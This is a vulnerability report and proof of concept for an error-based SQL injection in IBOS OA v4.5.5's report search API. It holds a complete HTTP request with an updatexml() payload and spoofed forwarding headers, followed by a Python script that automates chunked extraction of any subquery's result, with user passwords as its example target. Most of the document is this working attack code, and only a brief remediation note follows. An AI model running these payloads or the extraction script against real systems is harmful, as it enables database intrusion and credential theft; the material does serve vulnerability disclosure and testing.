IBOS OA v4.5.5 SQL injection vulnerability
Download link: https://gitee.com/ibos/IBOS
Affected function: Report module => search box (the `keyword.subject` field of the report list API)
POC
```http
POST /?r=report/api/getlist HTTP/1.1
Host: www.ibos.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/json;utf-8
X-Requested-With: XMLHttpRequest
Content-Length: 124
Origin: http://www.ibos.com
Connection: close
Referer: http://www.ibos.com/?r=report/default/index
Cookie: 4tVy_saltkey=JPW119wg; PHPSESSID=0pbgbc7oflgcqf792p92nqo7u0; 4tVy_sid=0r6tzo; lastautologin=0; 4tVy_lastactivity=1679978644; 4tVy_ulastactivity=d9bdiYlHnIPm8Tx0Dnc%2BPNmlkEXAIfB%2BmyV9r5ENIIsFGRSnQdPC; 4tVy_creditremind=0D0D2D0D0D0D1; 4tVy_creditbase=0D4D47D5D0D0; 4tVy_creditrule=%E6%AF%8F%E5%A4%A9%E7%99%BB%E5%BD%95; 4tVy_dropnotify=%7B%22assignment%22%3A%221%22%2C%22email%22%3A%221%22%2C%22officialdoc%22%3A%223%22%2C%22user%22%3A%222%22%2C%22vote%22%3A%222%22%2C%22unread_notify%22%3A9%2C%22unread_atme%22%3A0%2C%22unread_comment%22%3A0%2C%22unread_message%22%3A1%2C%22new_folower_count%22%3A0%2C%22unread_total%22%3A10%7D
X-Forwarded-For: 127.0.0.1
X-Originating-IP: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1

{"limit":10,"offset":0,"type":"send","keyword":{"subject":"') AND (updatexml(1,concat(0x7e,(select user()),0x7e),1))-- qw"}}
```
The request is sent as an authenticated user (note the session cookie). The `subject` value closes the quoted search term and appends an `updatexml()` call, so MySQL returns an `XPATH syntax error` whose message contains the result of the injected subquery, here `user()`. Replacing `user()` with `database()` leaks the database name the same way, which is the error-based extraction this report relies on.
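The following is an added example, not code from the report or from the IBOS project. It generalizes the PoC payload above: `updatexml()` shows at most 32 characters of the offending string in its error message, so any value longer than that has to be pulled in `substr()` windows. The script builds the payload for an arbitrary subquery, parses the leaked window out of a response, and walks the windows until the value is complete. No network traffic is sent: `fake_vulnerable_endpoint` is a constructed stand-in for `?r=report/api/getlist` that mimics MySQL's error behaviour, and the `secret` values it leaks are made up.

```python
"""Error-based extraction helpers for the updatexml() payload in the PoC.

Added example (not from IBOS or the original report). The endpoint below is a
constructed simulation of the vulnerable search; swap `send` for a real
requests.post() call against a system you are authorized to test.
"""
import re

# MySQL truncates the string quoted in "XPATH syntax error: '...'" to 32
# characters. The two 0x7e ('~') delimiters use two of them, leaving 30 per
# request for the actual data.
CHUNK = 30


def build_payload(subquery: str, offset: int = 1, chunk: int = CHUNK) -> str:
    """Value for keyword.subject, in the shape used by the PoC.

    Closes the quoted LIKE term with ') and forces an XPATH error whose message
    carries `chunk` characters of `subquery`'s result starting at `offset`
    (1-based, as MySQL substr() counts).
    """
    window = f"substr(({subquery}),{offset},{chunk})"
    return f"') AND (updatexml(1,concat(0x7e,{window},0x7e),1))-- qw"


def build_body(subject_payload: str) -> dict:
    """JSON body matching the PoC request to ?r=report/api/getlist."""
    return {"limit": 10, "offset": 0, "type": "send",
            "keyword": {"subject": subject_payload}}


# Matches the leaked window between the '~' delimiters wherever the MySQL
# error text appears in the response (JSON, HTML error page, or plain text).
ERR_RE = re.compile(r"XPATH syntax error: '~(.*?)~?'")


def extract_leak(response_text: str):
    """Return the text MySQL leaked between the ~ delimiters, or None."""
    m = ERR_RE.search(response_text)
    return m.group(1) if m else None


def dump_value(send, subquery: str, chunk: int = CHUNK) -> str:
    """Recover a value of any length by walking substr() windows.

    `send` takes the JSON body and returns the response text. Stops at the
    first window that comes back shorter than `chunk` (or empty), which means
    the end of the value was reached.
    """
    out, offset = "", 1
    while True:
        body = build_body(build_payload(subquery, offset, chunk))
        piece = extract_leak(send(body))
        if not piece:
            break
        out += piece
        if len(piece) < chunk:
            break
        offset += chunk
    return out


def fake_vulnerable_endpoint(body: dict, secret: str = "root@localhost") -> str:
    """Constructed stand-in for the vulnerable search endpoint (assumption:
    the real response embeds the raw MySQL error somewhere in its text).

    It only evaluates the substr() window from the injected payload against a
    made-up `secret` and reproduces MySQL's 32-character error truncation.
    """
    subject = body["keyword"]["subject"]
    m = re.search(r"substr\(\((.*)\),(\d+),(\d+)\)", subject)
    if not m:
        return '{"isSuccess":true,"data":[]}'
    offset, chunk = int(m.group(2)), int(m.group(3))
    window = secret[offset - 1:offset - 1 + chunk]
    msg = ("~" + window + "~")[:32]  # MySQL shows at most 32 characters
    return f'{{"isSuccess":false,"msg":"XPATH syntax error: \'{msg}\'"}}'


if __name__ == "__main__":
    # user() fits in one window; a 64-character hash (constructed) needs three.
    print(dump_value(fake_vulnerable_endpoint, "select user()"))
    long_secret = "a" * 64
    print(dump_value(lambda b: fake_vulnerable_endpoint(b, long_secret),
                     "select password from ibos_user limit 1"))
```

The `updatexml()` trick only works while the application reflects database errors to the client; if error display is disabled the same injection point is still exploitable, but with a boolean- or time-based technique instead. On the server side the fix is to bind the keyword as a query parameter rather than concatenating it into the `LIKE` condition.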